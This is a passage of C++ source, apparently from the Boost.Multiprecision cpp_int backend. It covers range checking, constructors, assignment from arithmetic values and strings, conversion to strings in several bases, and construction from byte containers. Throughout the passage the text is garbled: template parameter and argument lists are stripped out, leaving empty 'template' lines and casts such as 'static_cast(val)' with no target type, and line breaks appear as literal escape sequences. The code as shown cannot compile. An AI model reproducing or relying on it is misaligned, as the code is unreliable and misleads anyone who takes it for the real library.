(int)MinBits)>::type\r\n check_in_range(T val, const mpl::int_&, const boost::false_type&)\r\n {\r\n typedef typename common_type::type common_type;\r\n\r\n if(static_cast(val) > limb_mask)\r\n BOOST_THROW_EXCEPTION(std::range_error(\"The argument to a cpp_int constructor exceeded the largest value it can represent.\"));\r\n }\r\n template \r\n void check_in_range(T val, const mpl::int_&, const boost::true_type&)\r\n {\r\n typedef typename common_type::type common_type;\r\n\r\n if(static_cast(val) > limb_mask)\r\n BOOST_THROW_EXCEPTION(std::range_error(\"The argument to a cpp_int constructor exceeded the largest value it can represent.\"));\r\n if(val < 0)\r\n BOOST_THROW_EXCEPTION(std::range_error(\"The argument to an unsigned cpp_int constructor was negative.\"));\r\n }\r\n template \r\n BOOST_MP_FORCEINLINE void check_in_range(T, const mpl::int_&, const boost::integral_constant&) BOOST_NOEXCEPT {}\r\n\r\n template \r\n BOOST_MP_FORCEINLINE void check_in_range(T val) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().check_in_range(std::declval(), checked_type(), is_signed())))\r\n {\r\n check_in_range(val, checked_type(), is_signed());\r\n }\r\n\r\npublic:\r\n //\r\n // Direct construction:\r\n //\r\n#ifdef __MSVC_RUNTIME_CHECKS\r\n template \r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(SI i, typename boost::enable_if_c::value && (Checked == unchecked) >::type const* = 0) BOOST_NOEXCEPT\r\n : m_data(i < 0 ? (1 + ~static_cast(-i & limb_mask)) & limb_mask : static_cast(i & limb_mask)) {}\r\n template \r\n BOOST_MP_FORCEINLINE cpp_int_base(SI i, typename boost::enable_if_c::value && (Checked == checked) >::type const* = 0) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().check_in_range(std::declval())))\r\n : m_data(i < 0 ? 1 + ~static_cast(-i & limb_mask) : static_cast(i & limb_mask)) { check_in_range(i); }\r\n template \r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(UI i, typename boost::enable_if_c::value && (Checked == unchecked) >::type const* = 0) BOOST_NOEXCEPT\r\n : m_data(static_cast(i & limb_mask)) {}\r\n template \r\n BOOST_MP_FORCEINLINE cpp_int_base(UI i, typename boost::enable_if_c::value && (Checked == checked) >::type const* = 0) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().check_in_range(std::declval())))\r\n : m_data(static_cast(i & limb_mask)) { check_in_range(i); }\r\n#else\r\n template \r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(SI i, typename boost::enable_if_c::value && (Checked == unchecked) >::type const* = 0) BOOST_NOEXCEPT\r\n : m_data(i < 0 ? (1 + ~static_cast(-i)) & limb_mask : static_cast(i) & limb_mask) {}\r\n template \r\n BOOST_MP_FORCEINLINE cpp_int_base(SI i, typename boost::enable_if_c::value && (Checked == checked) >::type const* = 0) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().check_in_range(std::declval())))\r\n : m_data(i < 0 ? 1 + ~static_cast(-i) : static_cast(i)) { check_in_range(i); }\r\n template \r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(UI i, typename boost::enable_if_c::value && (Checked == unchecked) >::type const* = 0) BOOST_NOEXCEPT\r\n : m_data(static_cast(i) & limb_mask) {}\r\n template \r\n BOOST_MP_FORCEINLINE cpp_int_base(UI i, typename boost::enable_if_c::value && (Checked == checked) >::type const* = 0) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().check_in_range(std::declval())))\r\n : m_data(static_cast(i)) { check_in_range(i); }\r\n#endif\r\n template \r\n BOOST_MP_FORCEINLINE cpp_int_base(F i, typename boost::enable_if >::type const* = 0) BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n : m_data(static_cast(std::fabs(i)) & limb_mask)\r\n {\r\n check_in_range(i);\r\n if(i < 0)\r\n negate();\r\n }\r\n#if defined(BOOST_MP_USER_DEFINED_LITERALS)\r\n BOOST_CONSTEXPR cpp_int_base(literals::detail::value_pack<>) BOOST_NOEXCEPT\r\n : m_data(static_cast(0u)) {}\r\n template \r\n BOOST_CONSTEXPR cpp_int_base(literals::detail::value_pack) BOOST_NOEXCEPT\r\n : m_data(static_cast(a)) {}\r\n template \r\n BOOST_CONSTEXPR cpp_int_base(literals::detail::value_pack) BOOST_NOEXCEPT\r\n : m_data(static_cast(a) | (static_cast(b) << bits_per_limb)) {}\r\n#endif\r\n //\r\n // Helper functions for getting at our internal data, and manipulating storage:\r\n //\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR unsigned size()const BOOST_NOEXCEPT { return 1; }\r\n BOOST_MP_FORCEINLINE limb_pointer limbs() BOOST_NOEXCEPT { return &m_data; }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR const_limb_pointer limbs()const BOOST_NOEXCEPT { return &m_data; }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR bool sign()const BOOST_NOEXCEPT { return false; }\r\n BOOST_MP_FORCEINLINE void sign(bool b) BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n {\r\n if(b)\r\n negate();\r\n }\r\n BOOST_MP_FORCEINLINE void resize(unsigned, unsigned min_size)\r\n {\r\n detail::verify_new_size(2, min_size, checked_type());\r\n }\r\n BOOST_MP_FORCEINLINE void normalize() BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n {\r\n detail::verify_limb_mask(true, m_data, limb_mask, checked_type());\r\n m_data &= limb_mask;\r\n }\r\n\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base() BOOST_NOEXCEPT : m_data(0) {}\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(const cpp_int_base& o) BOOST_NOEXCEPT\r\n : m_data(o.m_data) {}\r\n //~cpp_int_base() BOOST_NOEXCEPT {}\r\n BOOST_MP_FORCEINLINE void assign(const cpp_int_base& o) BOOST_NOEXCEPT\r\n {\r\n m_data = o.m_data;\r\n }\r\n BOOST_MP_FORCEINLINE void negate() BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n {\r\n if(Checked == checked)\r\n {\r\n BOOST_THROW_EXCEPTION(std::range_error(\"Attempt to negate an unsigned type.\"));\r\n }\r\n m_data = ~m_data;\r\n ++m_data;\r\n }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR bool isneg()const BOOST_NOEXCEPT\r\n {\r\n return false;\r\n }\r\n BOOST_MP_FORCEINLINE void do_swap(cpp_int_base& o) BOOST_NOEXCEPT\r\n {\r\n std::swap(m_data, o.m_data);\r\n }\r\n};\r\n//\r\n// Traits class, lets us know whether type T can be directly converted to the base type,\r\n// used to enable/disable constructors etc:\r\n//\r\ntemplate \r\nstruct is_allowed_cpp_int_base_conversion : public mpl::if_c<\r\n is_same::value || is_same::value\r\n#if defined(BOOST_LITTLE_ENDIAN) && !defined(BOOST_MP_TEST_NO_LE)\r\n || is_same::value || is_same::value\r\n#endif\r\n#if defined(BOOST_MP_USER_DEFINED_LITERALS)\r\n || literals::detail::is_value_pack::value\r\n#endif\r\n || (is_trivial_cpp_int::value && is_arithmetic::value),\r\n mpl::true_,\r\n mpl::false_\r\n >::type\r\n{};\r\n//\r\n// Now the actual backend, normalising parameters passed to the base class:\r\n//\r\ntemplate \r\nstruct cpp_int_backend\r\n : public cpp_int_base<\r\n min_precision >::value,\r\n max_precision >::value,\r\n SignType,\r\n Checked,\r\n Allocator,\r\n is_trivial_cpp_int >::value>\r\n{\r\n typedef cpp_int_backend self_type;\r\n typedef cpp_int_base<\r\n min_precision::value,\r\n max_precision::value,\r\n SignType,\r\n Checked,\r\n Allocator,\r\n is_trivial_cpp_int::value> base_type;\r\n typedef mpl::bool_::value> trivial_tag;\r\npublic:\r\n typedef typename mpl::if_<\r\n trivial_tag,\r\n mpl::list<\r\n signed char, short, int, long,\r\n boost::long_long_type, signed_double_limb_type>,\r\n mpl::list\r\n >::type signed_types;\r\n typedef typename mpl::if_<\r\n trivial_tag,\r\n mpl::list,\r\n mpl::list\r\n >::type unsigned_types;\r\n typedef typename mpl::if_<\r\n trivial_tag,\r\n mpl::list,\r\n mpl::list\r\n >::type float_types;\r\n typedef mpl::int_ checked_type;\r\n\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_backend() BOOST_NOEXCEPT{}\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_backend(const cpp_int_backend& o) BOOST_MP_NOEXCEPT_IF(boost::is_void::value) : base_type(o) {}\r\n#ifndef BOOST_NO_CXX11_RVALUE_REFERENCES\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_backend(cpp_int_backend&& o) BOOST_NOEXCEPT\r\n : base_type(static_cast(o)) {}\r\n#endif\r\n //\r\n // Direct construction from arithmetic type:\r\n //\r\n template \r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_backend(Arg i, typename boost::enable_if_c::value >::type const* = 0)BOOST_MP_NOEXCEPT_IF(noexcept(base_type(std::declval())))\r\n : base_type(i) {}\r\n\r\nprivate:\r\n template \r\n void do_assign(const cpp_int_backend& other, mpl::true_ const&, mpl::true_ const &)\r\n {\r\n // Assigning trivial type to trivial type:\r\n this->check_in_range(*other.limbs());\r\n *this->limbs() = static_cast(*other.limbs());\r\n this->sign(other.sign());\r\n this->normalize();\r\n }\r\n template \r\n void do_assign(const cpp_int_backend& other, mpl::true_ const&, mpl::false_ const &)\r\n {\r\n // non-trivial to trivial narrowing conversion:\r\n double_limb_type v = *other.limbs();\r\n if(other.size() > 1)\r\n {\r\n v |= static_cast(other.limbs()[1]) << bits_per_limb;\r\n if((Checked == checked) && (other.size() > 2))\r\n {\r\n BOOST_THROW_EXCEPTION(std::range_error(\"Assignment of a cpp_int that is out of range for the target type.\"));\r\n }\r\n }\r\n *this = v;\r\n this->sign(other.sign());\r\n this->normalize();\r\n }\r\n template \r\n void do_assign(const cpp_int_backend& other, mpl::false_ const&, mpl::true_ const &)\r\n {\r\n // trivial to non-trivial, treat the trivial argument as if it were an unsigned arithmetic type, then set the sign afterwards:\r\n *this = static_cast<\r\n typename boost::multiprecision::detail::canonical<\r\n typename cpp_int_backend::local_limb_type,\r\n cpp_int_backend\r\n >::type\r\n >(*other.limbs());\r\n this->sign(other.sign());\r\n }\r\n template \r\n void do_assign(const cpp_int_backend& other, mpl::false_ const&, mpl::false_ const &)\r\n {\r\n // regular non-trivial to non-trivial assign:\r\n this->resize(other.size(), other.size());\r\n std::memcpy(this->limbs(), other.limbs(), (std::min)(other.size(), this->size()) * sizeof(this->limbs()[0]));\r\n this->sign(other.sign());\r\n this->normalize();\r\n }\r\npublic:\r\n template \r\n cpp_int_backend(\r\n const cpp_int_backend& other,\r\n typename boost::enable_if_c, self_type>::value>::type* = 0)\r\n : base_type()\r\n {\r\n do_assign(\r\n other,\r\n mpl::bool_::value>(),\r\n mpl::bool_ >::value>());\r\n }\r\n template \r\n explicit cpp_int_backend(\r\n const cpp_int_backend& other,\r\n typename boost::disable_if_c, self_type>::value>::type* = 0)\r\n : base_type()\r\n {\r\n do_assign(\r\n other,\r\n mpl::bool_::value>(),\r\n mpl::bool_ >::value>());\r\n }\r\n template \r\n cpp_int_backend& operator=(\r\n const cpp_int_backend& other)\r\n {\r\n do_assign(\r\n other,\r\n mpl::bool_::value>(),\r\n mpl::bool_ >::value>());\r\n return *this;\r\n }\r\n#ifdef BOOST_MP_USER_DEFINED_LITERALS\r\n BOOST_CONSTEXPR cpp_int_backend(const cpp_int_backend& a, const literals::detail::negate_tag& tag)\r\n : base_type(static_cast(a), tag){}\r\n#endif\r\n\r\n BOOST_MP_FORCEINLINE cpp_int_backend& operator = (const cpp_int_backend& o) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().assign(std::declval())))\r\n {\r\n this->assign(o);\r\n return *this;\r\n }\r\n#ifndef BOOST_NO_CXX11_RVALUE_REFERENCES\r\n BOOST_MP_FORCEINLINE cpp_int_backend& operator = (cpp_int_backend&& o) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval() = std::declval()))\r\n {\r\n *static_cast(this) = static_cast(o);\r\n return *this;\r\n }\r\n#endif\r\nprivate:\r\n template \r\n typename boost::enable_if >::type do_assign_arithmetic(A val, const mpl::true_&) \r\n BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().check_in_range(std::declval())))\r\n {\r\n this->check_in_range(val);\r\n *this->limbs() = static_cast(val);\r\n this->normalize();\r\n }\r\n template \r\n typename boost::disable_if_c::value || !is_integral::value >::type do_assign_arithmetic(A val, const mpl::true_&) \r\n BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().check_in_range(std::declval())) && noexcept(std::declval().sign(true)))\r\n {\r\n this->check_in_range(val);\r\n *this->limbs() = (val < 0) ? static_cast(boost::multiprecision::detail::unsigned_abs(val)) : static_cast(val);\r\n this->sign(val < 0);\r\n this->normalize();\r\n }\r\n template \r\n typename boost::enable_if_c< !is_integral::value>::type do_assign_arithmetic(A val, const mpl::true_&)\r\n {\r\n this->check_in_range(val);\r\n *this->limbs() = (val < 0) ? static_cast(boost::multiprecision::detail::abs(val)) : static_cast(val);\r\n this->sign(val < 0);\r\n this->normalize();\r\n }\r\n BOOST_MP_FORCEINLINE void do_assign_arithmetic(limb_type i, const mpl::false_&) BOOST_NOEXCEPT\r\n {\r\n this->resize(1, 1);\r\n *this->limbs() = i;\r\n this->sign(false);\r\n }\r\n BOOST_MP_FORCEINLINE void do_assign_arithmetic(signed_limb_type i, const mpl::false_&) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().sign(true)))\r\n {\r\n this->resize(1, 1);\r\n *this->limbs() = static_cast(boost::multiprecision::detail::unsigned_abs(i));\r\n this->sign(i < 0);\r\n }\r\n void do_assign_arithmetic(double_limb_type i, const mpl::false_&) BOOST_NOEXCEPT\r\n {\r\n BOOST_STATIC_ASSERT(sizeof(i) == 2 * sizeof(limb_type));\r\n BOOST_STATIC_ASSERT(base_type::internal_limb_count >= 2);\r\n typename base_type::limb_pointer p = this->limbs();\r\n#ifdef __MSVC_RUNTIME_CHECKS\r\n *p = static_cast(i & ~static_cast(0));\r\n#else\r\n *p = static_cast(i);\r\n#endif\r\n p[1] = static_cast(i >> base_type::limb_bits);\r\n this->resize(p[1] ? 2 : 1, p[1] ? 2 : 1);\r\n this->sign(false);\r\n }\r\n void do_assign_arithmetic(signed_double_limb_type i, const mpl::false_&) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().sign(true)))\r\n {\r\n BOOST_STATIC_ASSERT(sizeof(i) == 2 * sizeof(limb_type));\r\n BOOST_STATIC_ASSERT(base_type::internal_limb_count >= 2);\r\n bool s = false;\r\n double_limb_type ui;\r\n if(i < 0)\r\n s = true;\r\n ui = static_cast(boost::multiprecision::detail::unsigned_abs(i));\r\n typename base_type::limb_pointer p = this->limbs();\r\n#ifdef __MSVC_RUNTIME_CHECKS\r\n *p = static_cast(ui & ~static_cast(0));\r\n#else\r\n *p = static_cast(ui);\r\n#endif\r\n p[1] = static_cast(ui >> base_type::limb_bits);\r\n this->resize(p[1] ? 2 : 1, p[1] ? 2 : 1);\r\n this->sign(s);\r\n }\r\n\r\n void do_assign_arithmetic(long double a, const mpl::false_&)\r\n {\r\n using default_ops::eval_add;\r\n using default_ops::eval_subtract;\r\n using std::frexp;\r\n using std::ldexp;\r\n using std::floor;\r\n\r\n if(a < 0)\r\n {\r\n do_assign_arithmetic(-a, mpl::false_());\r\n this->sign(true);\r\n return;\r\n }\r\n\r\n if (a == 0) {\r\n *this = static_cast(0u);\r\n }\r\n\r\n if (a == 1) {\r\n *this = static_cast(1u);\r\n }\r\n\r\n BOOST_ASSERT(!(boost::math::isinf)(a));\r\n BOOST_ASSERT(!(boost::math::isnan)(a));\r\n\r\n int e;\r\n long double f, term;\r\n *this = static_cast(0u);\r\n\r\n f = frexp(a, &e);\r\n\r\n static const limb_type shift = std::numeric_limits::digits;\r\n\r\n while(f)\r\n {\r\n // extract int sized bits from f:\r\n f = ldexp(f, shift);\r\n term = floor(f);\r\n e -= shift;\r\n eval_left_shift(*this, shift);\r\n if(term > 0)\r\n eval_add(*this, static_cast(term));\r\n else\r\n eval_subtract(*this, static_cast(-term));\r\n f -= term;\r\n }\r\n if(e > 0)\r\n eval_left_shift(*this, e);\r\n else if(e < 0)\r\n eval_right_shift(*this, -e);\r\n }\r\npublic:\r\n template \r\n BOOST_MP_FORCEINLINE typename boost::enable_if_c::value, cpp_int_backend&>::type operator = (Arithmetic val) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().do_assign_arithmetic(std::declval(), trivial_tag())))\r\n {\r\n do_assign_arithmetic(val, trivial_tag());\r\n return *this;\r\n }\r\nprivate:\r\n void do_assign_string(const char* s, const mpl::true_&)\r\n {\r\n std::size_t n = s ? std::strlen(s) : 0;\r\n *this = 0;\r\n unsigned radix = 10;\r\n bool isneg = false;\r\n if(n && (*s == '-'))\r\n {\r\n --n;\r\n ++s;\r\n isneg = true;\r\n }\r\n if(n && (*s == '0'))\r\n {\r\n if((n > 1) && ((s[1] == 'x') || (s[1] == 'X')))\r\n {\r\n radix = 16;\r\n s +=2;\r\n n -= 2;\r\n }\r\n else\r\n {\r\n radix = 8;\r\n n -= 1;\r\n }\r\n }\r\n if(n)\r\n {\r\n unsigned val;\r\n while(*s)\r\n {\r\n if(*s >= '0' && *s <= '9')\r\n val = *s - '0';\r\n else if(*s >= 'a' && *s <= 'f')\r\n val = 10 + *s - 'a';\r\n else if(*s >= 'A' && *s <= 'F')\r\n val = 10 + *s - 'A';\r\n else\r\n val = radix + 1;\r\n if(val >= radix)\r\n {\r\n BOOST_THROW_EXCEPTION(std::runtime_error(\"Unexpected content found while parsing character string.\"));\r\n }\r\n *this->limbs() = detail::checked_multiply(*this->limbs(), static_cast(radix), checked_type());\r\n *this->limbs() = detail::checked_add(*this->limbs(), static_cast(val), checked_type());\r\n ++s;\r\n }\r\n }\r\n if(isneg)\r\n this->negate();\r\n }\r\n void do_assign_string(const char* s, const mpl::false_&)\r\n {\r\n using default_ops::eval_multiply;\r\n using default_ops::eval_add;\r\n std::size_t n = s ? std::strlen(s) : 0;\r\n *this = static_cast(0u);\r\n unsigned radix = 10;\r\n bool isneg = false;\r\n if(n && (*s == '-'))\r\n {\r\n --n;\r\n ++s;\r\n isneg = true;\r\n }\r\n if(n && (*s == '0'))\r\n {\r\n if((n > 1) && ((s[1] == 'x') || (s[1] == 'X')))\r\n {\r\n radix = 16;\r\n s +=2;\r\n n -= 2;\r\n }\r\n else\r\n {\r\n radix = 8;\r\n n -= 1;\r\n }\r\n }\r\n //\r\n // Exception guarantee: create the result in stack variable \"result\"\r\n // then do a swap at the end. In the event of a throw, *this will\r\n // be left unchanged.\r\n //\r\n cpp_int_backend result;\r\n if(n)\r\n {\r\n if(radix == 16)\r\n {\r\n while(*s == '0') ++s;\r\n std::size_t bitcount = 4 * std::strlen(s);\r\n limb_type val;\r\n std::size_t limb, shift;\r\n if(bitcount > 4)\r\n bitcount -= 4;\r\n else\r\n bitcount = 0;\r\n std::size_t newsize = bitcount / (sizeof(limb_type) * CHAR_BIT) + 1;\r\n result.resize(static_cast(newsize), static_cast(newsize)); // will throw if this is a checked integer that cannot be resized\r\n std::memset(result.limbs(), 0, result.size() * sizeof(limb_type));\r\n while(*s)\r\n {\r\n if(*s >= '0' && *s <= '9')\r\n val = *s - '0';\r\n else if(*s >= 'a' && *s <= 'f')\r\n val = 10 + *s - 'a';\r\n else if(*s >= 'A' && *s <= 'F')\r\n val = 10 + *s - 'A';\r\n else\r\n {\r\n BOOST_THROW_EXCEPTION(std::runtime_error(\"Unexpected content found while parsing character string.\"));\r\n }\r\n limb = bitcount / (sizeof(limb_type) * CHAR_BIT);\r\n shift = bitcount % (sizeof(limb_type) * CHAR_BIT);\r\n val <<= shift;\r\n if(result.size() > limb)\r\n {\r\n result.limbs()[limb] |= val;\r\n }\r\n ++s;\r\n bitcount -= 4;\r\n }\r\n result.normalize();\r\n }\r\n else if(radix == 8)\r\n {\r\n while(*s == '0') ++s;\r\n std::size_t bitcount = 3 * std::strlen(s);\r\n limb_type val;\r\n std::size_t limb, shift;\r\n if(bitcount > 3)\r\n bitcount -= 3;\r\n else\r\n bitcount = 0;\r\n std::size_t newsize = bitcount / (sizeof(limb_type) * CHAR_BIT) + 1;\r\n result.resize(static_cast(newsize), static_cast(newsize)); // will throw if this is a checked integer that cannot be resized\r\n std::memset(result.limbs(), 0, result.size() * sizeof(limb_type));\r\n while(*s)\r\n {\r\n if(*s >= '0' && *s <= '7')\r\n val = *s - '0';\r\n else\r\n {\r\n BOOST_THROW_EXCEPTION(std::runtime_error(\"Unexpected content found while parsing character string.\"));\r\n }\r\n limb = bitcount / (sizeof(limb_type) * CHAR_BIT);\r\n shift = bitcount % (sizeof(limb_type) * CHAR_BIT);\r\n if(result.size() > limb)\r\n {\r\n result.limbs()[limb] |= (val << shift);\r\n if(shift > sizeof(limb_type) * CHAR_BIT - 3)\r\n {\r\n // Deal with the bits in val that overflow into the next limb:\r\n val >>= (sizeof(limb_type) * CHAR_BIT - shift);\r\n if(val)\r\n {\r\n // If this is the most-significant-limb, we may need to allocate an extra one for the overflow:\r\n if(limb + 1 == newsize)\r\n result.resize(static_cast(newsize + 1), static_cast(newsize + 1));\r\n if(result.size() > limb + 1)\r\n {\r\n result.limbs()[limb + 1] |= val;\r\n }\r\n }\r\n }\r\n }\r\n ++s;\r\n bitcount -= 3;\r\n }\r\n result.normalize();\r\n }\r\n else\r\n {\r\n // Base 10, we extract blocks of size 10^9 at a time, that way\r\n // the number of multiplications is kept to a minimum:\r\n limb_type block_mult = max_block_10;\r\n while(*s)\r\n {\r\n limb_type block = 0;\r\n for(unsigned i = 0; i < digits_per_block_10; ++i)\r\n {\r\n limb_type val;\r\n if(*s >= '0' && *s <= '9')\r\n val = *s - '0';\r\n else\r\n BOOST_THROW_EXCEPTION(std::runtime_error(\"Unexpected character encountered in input.\"));\r\n block *= 10;\r\n block += val;\r\n if(!*++s)\r\n {\r\n block_mult = block_multiplier(i);\r\n break;\r\n }\r\n }\r\n eval_multiply(result, block_mult);\r\n eval_add(result, block);\r\n }\r\n }\r\n }\r\n if(isneg)\r\n result.negate();\r\n result.swap(*this);\r\n }\r\npublic:\r\n cpp_int_backend& operator = (const char* s)\r\n {\r\n do_assign_string(s, trivial_tag());\r\n return *this;\r\n }\r\n BOOST_MP_FORCEINLINE void swap(cpp_int_backend& o) BOOST_NOEXCEPT\r\n {\r\n this->do_swap(o);\r\n }\r\nprivate:\r\n std::string do_get_trivial_string(std::ios_base::fmtflags f, const mpl::false_&)const\r\n {\r\n typedef typename mpl::if_c::type io_type;\r\n if(this->sign() && (((f & std::ios_base::hex) == std::ios_base::hex) || ((f & std::ios_base::oct) == std::ios_base::oct)))\r\n BOOST_THROW_EXCEPTION(std::runtime_error(\"Base 8 or 16 printing of negative numbers is not supported.\"));\r\n std::stringstream ss;\r\n ss.flags(f & ~std::ios_base::showpos);\r\n ss << static_cast(*this->limbs());\r\n std::string result;\r\n if(this->sign())\r\n result += '-';\r\n else if(f & std::ios_base::showpos)\r\n result += '+';\r\n result += ss.str();\r\n return result;\r\n }\r\n std::string do_get_trivial_string(std::ios_base::fmtflags f, const mpl::true_&)const\r\n {\r\n // Even though we have only one limb, we can't do IO on it :-(\r\n int base = 10;\r\n if((f & std::ios_base::oct) == std::ios_base::oct)\r\n base = 8;\r\n else if((f & std::ios_base::hex) == std::ios_base::hex)\r\n base = 16;\r\n std::string result;\r\n\r\n unsigned Bits = sizeof(typename base_type::local_limb_type) * CHAR_BIT;\r\n\r\n if(base == 8 || base == 16)\r\n {\r\n if(this->sign())\r\n BOOST_THROW_EXCEPTION(std::runtime_error(\"Base 8 or 16 printing of negative numbers is not supported.\"));\r\n limb_type shift = base == 8 ? 3 : 4;\r\n limb_type mask = static_cast((1u << shift) - 1);\r\n typename base_type::local_limb_type v = *this->limbs();\r\n result.assign(Bits / shift + (Bits % shift ? 1 : 0), '0');\r\n std::string::difference_type pos = result.size() - 1;\r\n for(unsigned i = 0; i < Bits / shift; ++i)\r\n {\r\n char c = '0' + static_cast(v & mask);\r\n if(c > '9')\r\n c += 'A' - '9' - 1;\r\n result[pos--] = c;\r\n v >>= shift;\r\n }\r\n if(Bits % shift)\r\n {\r\n mask = static_cast((1u << (Bits % shift)) - 1);\r\n char c = '0' + static_cast(v & mask);\r\n if(c > '9')\r\n c += 'A' - '9';\r\n result[pos] = c;\r\n }\r\n //\r\n // Get rid of leading zeros:\r\n //\r\n std::string::size_type n = result.find_first_not_of('0');\r\n if(!result.empty() && (n == std::string::npos))\r\n n = result.size() - 1;\r\n result.erase(0, n);\r\n if(f & std::ios_base::showbase)\r\n {\r\n const char* pp = base == 8 ? \"0\" : \"0x\";\r\n result.insert(static_cast(0), pp);\r\n }\r\n }\r\n else\r\n {\r\n result.assign(Bits / 3 + 1, '0');\r\n std::string::difference_type pos = result.size() - 1;\r\n typename base_type::local_limb_type v(*this->limbs());\r\n bool neg = false;\r\n if(this->sign())\r\n {\r\n neg = true;\r\n }\r\n while(v)\r\n {\r\n result[pos] = (v % 10) + '0';\r\n --pos;\r\n v /= 10;\r\n }\r\n std::string::size_type n = result.find_first_not_of('0');\r\n result.erase(0, n);\r\n if(result.empty())\r\n result = \"0\";\r\n if(neg)\r\n result.insert(static_cast(0), 1, '-');\r\n else if(f & std::ios_base::showpos)\r\n result.insert(static_cast(0), 1, '+');\r\n }\r\n return result;\r\n }\r\n std::string do_get_string(std::ios_base::fmtflags f, const mpl::true_&)const\r\n {\r\n#ifdef BOOST_MP_NO_DOUBLE_LIMB_TYPE_IO\r\n return do_get_trivial_string(f, mpl::bool_::value>());\r\n#else\r\n return do_get_trivial_string(f, mpl::bool_());\r\n#endif\r\n }\r\n std::string do_get_string(std::ios_base::fmtflags f, const mpl::false_&)const\r\n {\r\n using default_ops::eval_get_sign;\r\n int base = 10;\r\n if((f & std::ios_base::oct) == std::ios_base::oct)\r\n base = 8;\r\n else if((f & std::ios_base::hex) == std::ios_base::hex)\r\n base = 16;\r\n std::string result;\r\n\r\n unsigned Bits = this->size() * base_type::limb_bits;\r\n\r\n if(base == 8 || base == 16)\r\n {\r\n if(this->sign())\r\n BOOST_THROW_EXCEPTION(std::runtime_error(\"Base 8 or 16 printing of negative numbers is not supported.\"));\r\n limb_type shift = base == 8 ? 3 : 4;\r\n limb_type mask = static_cast((1u << shift) - 1);\r\n cpp_int_backend t(*this);\r\n result.assign(Bits / shift + ((Bits % shift) ? 1 : 0), '0');\r\n std::string::difference_type pos = result.size() - 1;\r\n for(unsigned i = 0; i < Bits / shift; ++i)\r\n {\r\n char c = '0' + static_cast(t.limbs()[0] & mask);\r\n if(c > '9')\r\n c += 'A' - '9' - 1;\r\n result[pos--] = c;\r\n eval_right_shift(t, shift);\r\n }\r\n if(Bits % shift)\r\n {\r\n mask = static_cast((1u << (Bits % shift)) - 1);\r\n char c = '0' + static_cast(t.limbs()[0] & mask);\r\n if(c > '9')\r\n c += 'A' - '9';\r\n result[pos] = c;\r\n }\r\n //\r\n // Get rid of leading zeros:\r\n //\r\n std::string::size_type n = result.find_first_not_of('0');\r\n if(!result.empty() && (n == std::string::npos))\r\n n = result.size() - 1;\r\n result.erase(0, n);\r\n if(f & std::ios_base::showbase)\r\n {\r\n const char* pp = base == 8 ? \"0\" : \"0x\";\r\n result.insert(static_cast(0), pp);\r\n }\r\n }\r\n else\r\n {\r\n result.assign(Bits / 3 + 1, '0');\r\n std::string::difference_type pos = result.size() - 1;\r\n cpp_int_backend t(*this);\r\n cpp_int_backend r;\r\n bool neg = false;\r\n if(t.sign())\r\n {\r\n t.negate();\r\n neg = true;\r\n }\r\n if(this->size() == 1)\r\n {\r\n result = boost::lexical_cast(t.limbs()[0]);\r\n }\r\n else\r\n {\r\n cpp_int_backend block10;\r\n block10 = max_block_10;\r\n while(eval_get_sign(t) != 0)\r\n {\r\n cpp_int_backend t2;\r\n divide_unsigned_helper(&t2, t, block10, r);\r\n t = t2;\r\n limb_type v = r.limbs()[0];\r\n for(unsigned i = 0; i < digits_per_block_10; ++i)\r\n {\r\n char c = '0' + v % 10;\r\n v /= 10;\r\n result[pos] = c;\r\n if(pos-- == 0)\r\n break;\r\n }\r\n }\r\n }\r\n std::string::size_type n = result.find_first_not_of('0');\r\n result.erase(0, n);\r\n if(result.empty())\r\n result = \"0\";\r\n if(neg)\r\n result.insert(static_cast(0), 1, '-');\r\n else if(f & std::ios_base::showpos)\r\n result.insert(static_cast(0), 1, '+');\r\n }\r\n return result;\r\n }\r\npublic:\r\n std::string str(std::streamsize /*digits*/, std::ios_base::fmtflags f)const\r\n {\r\n return do_get_string(f, trivial_tag());\r\n }\r\nprivate:\r\n template \r\n void construct_from_container(const Container& c, const mpl::false_&)\r\n {\r\n //\r\n // We assume that c is a sequence of (unsigned) bytes with the most significant byte first:\r\n //\r\n unsigned newsize = static_cast(c.size() / sizeof(limb_type));\r\n if(c.size() % sizeof(limb_type))\r\n {\r\n ++newsize;\r\n }\r\n if(newsize)\r\n {\r\n this->resize(newsize, newsize); // May throw\r\n std::memset(this->limbs(), 0, this->size());\r\n typename Container::const_iterator i(c.begin()), j(c.end());\r\n unsigned byte_location = static_cast(c.size() - 1);\r\n while(i != j)\r\n {\r\n unsigned limb = byte_location / sizeof(limb_type);\r\n unsigned shift = (byte_location % sizeof(limb_type)) * CHAR_BIT;\r\n if(this->size() > limb)\r\n this->limbs()[limb] |= static_cast(static_cast(*i)) << shift;\r\n ++i;\r\n --byte_location;\r\n }\r\n }\r\n }\r\n template \r\n void construct_from_container(const Container& c, const 